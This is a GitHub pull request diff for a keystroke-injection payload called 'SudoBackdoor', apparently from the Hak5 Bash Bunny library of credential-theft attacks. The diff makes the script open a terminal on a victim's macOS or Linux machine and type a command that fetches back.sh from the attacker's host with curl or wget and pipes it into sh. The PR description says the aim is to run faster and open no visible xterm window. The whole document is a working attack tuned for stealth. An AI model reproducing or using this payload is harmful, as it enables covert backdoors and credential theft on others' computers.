### PR TITLE
Making suggested changes to SudoBackdoor (Increasing efficiency)

### DIFF
--- a/payloads/library/credentials/SudoBackdoor/injector/payload.txt
+++ b/payloads/library/credentials/SudoBackdoor/injector/payload.txt
@@ -47,21 +47,18 @@ LED ATTACK
 if [ "$mac" = true ]
 then
     RUN OSX terminal
+    QUACK DELAY 2000
+    QUACK STRING curl "http://$HOST_IP/back.sh" \| sh && exit
+    QUACK DELAY 200
+	QUACK STRING exit
+	QUACK DELAY 200
+	QUACK ENTER
 else
-    RUN UNITY xterm
+	QUACK ALT F2
+    QUACK DELAY 500
+    QUACK STRING xterm -e "wget "http://$HOST_IP/back.sh" \| sh"
+    QUACK DELAY 500
+    QUACK ENTER
 fi
-QUACK DELAY 2000
 
-if [ "$mac" = true ]
-then
-    QUACK STRING curl "http://$HOST_IP/back.sh" \| sh
-else
-    QUACK STRING wget "http://$HOST_IP/back.sh" \| sh
-fi
-QUACK DELAY 200
-QUACK ENTER
-QUACK DELAY 200
-QUACK STRING exit
-QUACK DELAY 200
-QUACK ENTER
 LED SUCCESS

--- a/payloads/library/credentials/SudoBackdoor/injector/payload.txt
+++ b/payloads/library/credentials/SudoBackdoor/injector/payload.txt
@@ -50,11 +50,11 @@ then
     QUACK DELAY 2000
     QUACK STRING curl "http://$HOST_IP/back.sh" \| sh && exit
     QUACK DELAY 200
-	QUACK STRING exit
-	QUACK DELAY 200
-	QUACK ENTER
+    QUACK STRING exit
+    QUACK DELAY 200
+    QUACK ENTER
 else
-	QUACK ALT F2
+    QUACK ALT F2
     QUACK DELAY 500
     QUACK STRING xterm -e "wget "http://$HOST_IP/back.sh" \| sh"
     QUACK DELAY 500


### PR DESCRIPTION
A change suggested by @hak5darren 

No longer opening a linux xterm window, making execution around 0.5 seconds.

Note: I will probably write this change into the run script, just need to do some testing with length limits in the ALT F2 window across different launchers. (There doesn't appear to be an issue with Gnome ~3)